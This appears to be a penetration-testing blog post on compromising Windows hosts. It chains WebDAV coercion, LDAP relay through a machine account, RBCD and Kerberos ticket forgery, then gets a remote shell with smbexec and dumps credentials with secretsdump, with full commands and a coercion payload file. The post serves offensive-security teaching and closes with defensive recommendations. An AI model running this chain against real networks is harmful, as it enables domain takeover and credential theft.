Open in app

Sign in

Write

Sign in

WebDAV & LDAP Relay via MachineAccountQuota

Caleb
8 min readMar 17, 2025

WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that enables users to collaboratively manage and edit files stored on web servers. In essence, it allows a server to function as a file system, giving users the ability to create, read, modify, and delete files or directories on the server remotely. This protocol is commonly used for file sharing and version control over the internet and is supported by various platforms, including SharePoint and other cloud-based services.

WebClient is a Windows service that facilitates interaction between Windows-based applications and WebDAV servers. When the WebClient service is running, users can map a WebDAV folder to a drive letter on their computer, allowing the server-hosted folder to function like a local drive. This feature provides seamless access to and manipulation of files on a WebDAV server, mirorring the experience of working with files stored locally.

Historically, the WebClient service was enabled by default in Windows operating systems. However, as of November 2023, the WebClient service has been deprecated (Reference: https://learn.microsoft.com/en-us/windows/whats-new/deprecated-feature) and is no longer started by default on Windows systems.

Despite this, it is not uncommon to find WebClient running on Windows workstations or even Windows servers (when the Desktop Experience is installed) in client environments.

Prerequisites

To exploit WebDAV, the following conditions must be met:

  • The WebClient service must be enabled on the target host.
  • You must have the ability to add a computer account using MachineAccountQuota (which is set to 10 by default).
  • LDAP signing and channel binding must not be enforced on the domain controller (these are not enforced by default).
  • An authentication coercion technique must successfully work against the target host.

Enumeration

You can use NetExec tool’s webdav module to enumerate hosts where the WebClient service is active:

nxc smb TARGET(S) -d FQDN -u USERNAME -p 'PASSWORD' -M webdav

If there are no hosts with the WebClient service running, you can force it to start using a .searchConnector-ms file. Please note that this technique requires user interaction.

First, as a low-privilege domain user (in the context of an assumed breached scenario), you need to enumerate network shares with WRITE access on the target host:

nxc smb TARGET(S) -d FQDN -u USERNAME -p 'PASSWORD' --shares

Forced Authentication

Please note that if the target host already has the WebClient service running, the following steps can be skipped.

Once a network share with WRITE access is identified on the target host, the payload below can be crafted. Save this payload as @test.searchConnector-ms. Characters like @ often take precedence over letters and numbers, meaning files with names starting with @ will appear at the top of file listings.

<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <description>Microsoft Outlook</description>
    <isSearchOnlyItem>false</isSearchOnlyItem>
    <includeInStartMenuScope>true</includeInStartMenuScope>
    <templateInfo>
        <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    </templateInfo>
    <simpleLocation>
        <url>https://pentest/</url>
    </simpleLocation>
</searchConnectorDescription>

Once the payload is created, you can use the smbclient tool to connect to the network share and upload it:

smbclient -U FQDN/USERNAME%'PASSWORD' "\\\\TARGET_HOST\\SHARE"
put @test.searchConnector-ms
ls

Currently, the WebClient service is not running on the target host 192.168.56.22.

However, when the victim user navigates to the network share containing the payload, note that the user does not need to click or open the @test.searchConnector-ms file. Simply opening the network share (in this case, “all”) that contains the @test.searchConnector-ms file is sufficient to trigger.

As a result, the WebClient service will start running on the target host.

Further Enumeration

The NetExec tool’s maq module can be used to enumerate MachineAccountQuota value:

nxc ldap DOMAIN_CONTROLLER -d FQDN -u USERNAME -p 'PASSWORD' -M maq

The MachineAccountQuota is an attribute in Active Directory that determines how many computer accounts an authenticated user can create in a domain. By default, this value is set to 10, meaning each user can join up to 10 computers to the domain without requiring additional permissions.

The NetExec tool’s ldap-checker module can be used to enumerate LDAP configurations:

nxc ldap DOMAIN_CONTROLLER -d FQDN -u USERNAME -p 'PASSWORD' -M ldap-checker

LDAP (Lightweight Directory Access Protocol) is an open, industry-standard protocol used to access and manage directory services. It enables systems to communicate with a directory service for tasks such as login authentication, querying user details, or retrieving information about networked devices.

LDAP signing ensures the integrity of LDAP traffic by digitally signing the data. This verifies the authenticity of the source and ensures that the data has not been tampered with during transmission.

Channel binding ties the transport layer (e.g., TLS) to the application layer (LDAP). It creates a unique fingerprint for the communication session, ensuring that intercepted communications cannot be reused. This provides an additional layer of security by preventing attackers from hijacking or replaying LDAP sessions.

LDAP signing and channel binding must not be enforced on the domain controller to relay LDAP.

The NetExec tool’s coerce_plus module can be used to enumerate available authentication coercion techniques on the target host with WebClient enabled:

nxc ldap TARGET_HOST -d FQDN -u USERNAME -p 'PASSWORD' -M coerce_plus

Authentication coercion refers to techniques used by attackers to force a system or user to authenticate with an attacker-controlled resource. This is often employed to capture authentication credentials, such as Net-NTLM hashes, which can then be leveraged for further attacks, including credential relay or brute force cracking.

In this case, the target host is vulnerable to PetitPotam, PrinterBug, and MSEven authentication coercion techniques.

All prerequisites for WebDAV exploitation have been confirmed.

Exploitation

The NetExec tool’s add-computer module can be used to add a computer account via MachineAccountQuota as a low-privileged domain user:

nxc smb DOMAIN_CONTROLLER -d FQDN -u USERNAME  -p 'PASSWORD' -M add-computer -o NAME=PENTEST PASSWORD='PenetrationTest2025!'

Domain user accounts with a dollar sign ($) at the end of their name are computer accounts (also referred to as machine accounts). These accounts essentially represent computers in Active Directory. However, for simplicity, you can think of them as regular domain user accounts.

Notably, machine accounts can edit their own AllowedToActOnBehalfOfOtherIdentity attribute, which allows for Resource-Based Constrained Delegation (RBCD) attacks.

To confirm access to the created computer account, use the following command:

nxc smb DOMAIN_CONTROLLER -d FQDN -u PENTEST$ -p 'PenetrationTest2025!'

For the LDAP relay to work, a NetBIOS name assigned to the attacker machine or a DNS record pointing to the attacker machine is required. While creating a DNS record as a low-privileged domain user is possible via ADIDNS, this walkthrough uses the responder tool to assign a NetBIOS name.

Install responder on the attacker machine and configure it:

sudo apt install responder -y
nano /usr/share/responder/Responder.conf

Turn SMB and HTTP off for LDAP relay to function. Leave the rest of the configuration unchanged. The configuration file should look like the following:

Identify the appropriate network interface that allows you to connect to the target hosts.

Start responder:

responder -I INTERFACE

Above is the NetBIOS name assigned to the attacker machine.

Start the LDAP relay using the ntlmrelayx tool:

ntlmrelayx.py -t ldap://DOMAIN_CONTROLLER --delegate-access -smb2support --escalate-user PENTEST\$

Download an authentication coercion tool, PetitPotam:

wget https://raw.githubusercontent.com/topotam/PetitPotam/main/PetitPotam.py

Coerce authentication on the target host with the WebClient service running:

python3 PetitPotam.py -d FQDN -u USERNAME -p 'PASSWORD' NETBIOS_NAME@80/pentest TARGET_HOST

The coerced authentication is relayed to the domain controller’s LDAP service to configure the appropriate delegation rights for RBCD. LDAP relay succeeds because the domain controller does not enforce LDAP signing or channel binding.

Resource-Based Constrained Delegation (RBCD) is a security feature in Active Directory that allows services to delegate authentication to other services on behalf of a user. If an account with permission to edit the AllowedToActOnBehalfOfOtherIdentity attribute is compromised, an attacker can configure RBCD for that object. Machine accounts can edit their own AllowedToActOnBehalfOfOtherIdentity attribute, hence allowing RBCD attacks on relayed machines.

Using delegation rights, any domain user (including domain admins) can be impersonated on the target host where the WebClient service is enabled.

To obtain the forged Kerberos ticket of a domain admin user on the target host:

getST.py -dc-ip DOMAIN_CONTROLLER -spn host/TARGET_HOST_FQDN -impersonate USER_TO_IMPERSONATE FQDN/'PENTEST$':'PenetrationTest2025!'

Please note that if the Administrator domain admin account is disabled, another enabled domain admin user can be impersonated.

Install the Kerberos client to allow the attacker machine to authenticate with the Key Distribution Center (KDC):

sudo apt install krb5-user -y

Import the forged Kerberos ticket:

export KRB5CCNAME=CCACHE_FILE
klist

With the forged Kerberos ticket, perform pass-the-ticket to gain a remote shell.

smbexec.py FQDN/IMPERSONATED_USER@TARGET_HOST_FQDN -k -no-pass

If the following error occurs, add the domain controller as the DNS server on the attacker machine via resolv.conf.

sudo nano resolv.conf

The following screenshot shows the remote shell obtained.

It is also possible to dump credentials using the forged Kerberos ticket.

secretsdump.py FQDN/IMPERSONATED_USER@TARGET_HOST_FQDN -k -no-pass

The following screenshot shows the successful SAM dump.

With the obtained local admin NTLM hash, pass-the-hash can be performed to confirm administrative access.

From here, you can attempt password spraying with the obtained local admin NTLM hash to exploit password reuse within the environment. Alternatively, you can escalate privileges further within the domain by dumping cached credentials from LSASS or LSA secrets or by performing token impersonation using processes running in the context of high-privileged users.

Recommendation

To prevent WebDAV exploitation, the following are recommended:

  • Disable the WebDAV service on Windows systems if it is not required.
  • Restrict low-privileged domain users from adding computer accounts via MachineAccountQuota.
  • Enforce LDAP signing and channel binding on the domain controller.

Conclusion

Attackers can compromise Windows workstations and potentially servers (if Desktop Experience is installed) by exploiting WebDAV via LDAP relay using machine accounts.

Happy hacking!

Webdav
Ldap Relay
Machineaccountquota
Offensive Security
Penetration Test

--

--

Caleb
Caleb

Written by Caleb

3 Followers
3 Following

Ethical Hacker & Exploit Dev

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech